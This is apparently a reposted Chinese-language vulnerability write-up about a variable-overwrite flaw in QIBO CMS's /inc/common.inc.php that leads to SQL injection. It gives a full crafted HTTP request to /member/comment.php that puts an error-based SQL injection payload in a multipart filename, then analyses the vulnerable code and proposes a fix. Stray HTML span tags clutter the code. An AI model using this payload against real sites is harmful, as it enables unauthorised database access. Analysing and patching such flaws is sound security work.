Home > php教程 > php手册 > QIBO CMS /inc/common.inc.php Local Variables Overriding Vul

QIBO CMS /inc/common.inc.php Local Variables Overriding Vul

WBOY
Release: 2016-06-06 19:48:02
Original
1784 people have browsed it

目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册,这是模拟了GPC的功能,但同时也引入 " 本地变量

目录

<span>1</span><span>. 漏洞描述
</span><span>2</span><span>. 漏洞触发条件
</span><span>3</span><span>. 漏洞影响范围
</span><span>4</span><span>. 漏洞代码分析
</span><span>5</span><span>. 防御方法
</span><span>6</span>. 攻防思考
Copy after login

 

1. 漏洞描述

齐博在/inc/common.inc.php使用$$_key=$value、extract等逻辑实现了外部输入变量的本地注册,这是模拟了GPC的功能,但同时也引入<span>"</span><span>本地变量覆盖</span><span>"</span>、<span>"</span><span>本地变量未初始化</span><span>"</span><span>的安全风险
齐博CMS中的漏洞文件</span>/inc/common.inc.php使用 @extract($_FILES, EXTR_SKIP)来注册$_FILES的各变量,使用EXTR_SKIP来控制不覆盖已存在的变量。利用一个末初始化的变量覆盖漏洞,即可导致sql注入漏洞
Copy after login

Relevant Link:

http:<span>//</span><span>bbs.qibosoft.com/read-forum-tid-422299.htm</span>
Copy after login


2. 漏洞触发条件

0x1: 攻击入口

构造$_FILE的变量覆盖构造覆盖$cidDB变量,POST给/member/comment.php

<span>1</span>. 首先访问/member下面的<span>"</span><span>评论管理</span><span>"</span><span>功能,抓包

</span><span>2</span><span>. 在http request中构造一个attachment,如下:
</span><span>/*</span><span>
POST /qibo/member/comment.php?job=yz&yz=0 HTTP/1.1  
Host: 127.0.0.1  
Proxy-Connection: keep-alive  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,</span><span>*/</span>*;q=<span>0.8</span><span>  
User</span>-Agent: Mozilla/<span>5.0</span> (Windows NT <span>6.1</span>; WOW64) AppleWebKit/<span>537.36</span> (KHTML, like Gecko) Chrome/<span>28.0</span>.<span>1500.95</span> Safari/<span>537.36</span> SE <span>2</span>.X MetaSr <span>1.0</span><span>  
Referer: http:</span><span>//</span><span>127.0.0.1/qibo/member/comment.php?job=work  </span>
Accept-<span>Encoding: gzip,deflate,sdch  
Accept</span>-Language: zh-CN,zh;q=<span>0.8</span><span>  
Cookie: PHPSESSID</span>=<span>jo9rpav7l51iakidv01vr9fem1;   
passport</span>=<span>1</span>%09admin%09ClAKVgsEBglUAwcFUgRTDgRRCF9XUAZXBAcAVQIHBlc%3D94606de1fd; USR=fvqnvbj3%<span>0922</span>%<span>091425969668</span>%09http%3A%2F%2F127.<span>0.0</span>.<span>1</span>%2Fqibo%2Fmember%2Fcomment.php%3Fjob%<span>3Dwork  
Content</span>-Type: multipart/form-<span>data;   
boundary</span>=----<span>WebKitFormBoundary6ukpBHoIrpHKtOkl  
Content</span>-Length: <span>227</span>  
   
------<span>WebKitFormBoundary6ukpBHoIrpHKtOkl  
Content</span>-Disposition: form-data; name=<span>"</span><span>cidDB</span><span>"</span>; filename=<span>"</span><span>1' and EXP(~(select * from(select user())a)) -- </span><span>"</span><span>  
Content</span>-Type: text/<span>plain  
   
</span><span>1111</span>  
------WebKitFormBoundary6ukpBHoIrpHKtOkl--
*/<span>
注意将原来的URL上的cidDB[]</span>=<span>x删除掉;
然后构造一个文件上传的报文(GET改为POST方法)
在filename处填入注入的payload

</span><span>3</span><span>. 提交该数据包,即可注入成功
</span><span>//</span><span>这次的变量覆盖是抓住了extract的EXTR_SKIP只检查已经存在的变量,但是有些没有声明的变量还是会被覆盖</span>
Copy after login

Relevant Link:

http:<span>//</span><span>bobao.360.cn/learning/detail/291.html</span>
Copy after login


3. 漏洞影响范围

齐博所有系统、所有版本


4. 漏洞代码分析

\qibo\inc\common.inc.php

<span>/*</span><span>
全局变量文件对GPC变量的过滤
从代码中可以看淡,通过$_FILE传的值,POST的内容受GPC影响,因此只能利用$_FILE变量的$key绕过add_S函数
这里,$_FILS在传递参数时,是数组形式,因此可以默认使用$_FILES的$key去覆盖
</span><span>*/</span><span>
$_POST</span>=<span>Add_S($_POST);
$_GET</span>=<span>Add_S($_GET);
$_COOKIE</span>=<span>Add_S($_COOKIE);

function Add_S($array)
{
    </span><span>foreach</span>($array <span>as</span> $key=><span>$value)
    {
        </span><span>if</span>(!<span>is_array($value))
        {
            $value</span>=str_replace(<span>"</span><span></span><span>"</span>,<span>"</span><span>& # x</span><span>"</span>,$value);    <span>//</span><span>过滤一些不安全字符</span>
            $value=preg_replace(<span>"</span><span>/eval/i</span><span>"</span>,<span>"</span><span>eva l</span><span>"</span>,$value);    <span>//</span><span>过滤不安全函数</span>
            !get_magic_quotes_gpc() && $value=<span>addslashes($value);
            $array[$key]</span>=<span>$value;
        }
        </span><span>else</span><span>
        {
            $array[$key]</span>=<span>Add_S($array[$key]); 
        }
    }
    </span><span>return</span><span> $array;
}

</span><span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>))
{
    @extract($_FILES,EXTR_SKIP);
}

</span><span>foreach</span>($_COOKIE AS $_key=><span>$_value)
{
    unset($$_key);
}
</span><span>foreach</span>($_POST AS $_key=><span>$_value)
{
    </span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_POST[$_key];
}
</span><span>foreach</span>($_GET AS $_key=><span>$_value)
{
    </span>!ereg(<span>"</span><span>^\_[A-Z]+</span><span>"</span>,$_key) && $$_key=<span>$_GET[$_key];
}</span>
Copy after login


5. 防御方法

\qibo\inc\common.inc.php

<span>if</span>(!ini_get(<span>'</span><span>register_globals</span><span>'</span><span>))
{
    $array </span>= array(<span>'</span><span>Filedata</span><span>'</span>,<span>'</span><span>postfile</span><span>'</span>,<span>'</span><span>upfile</span><span>'</span>,<span>'</span><span>fileData</span><span>'</span>,<span>'</span><span>Filedata</span><span>'</span><span>);
    </span><span>foreach</span>($array AS $key=><span>$value)
    {
        is_array($_FILES[$value]) </span>&& $$value =<span> $_FILES[$value];
    }
}</span>
Copy after login


6. 攻防思考

Copyright (c) 2014 LittleHann All rights reserved

 

Related labels:
cms
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Recommendations
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template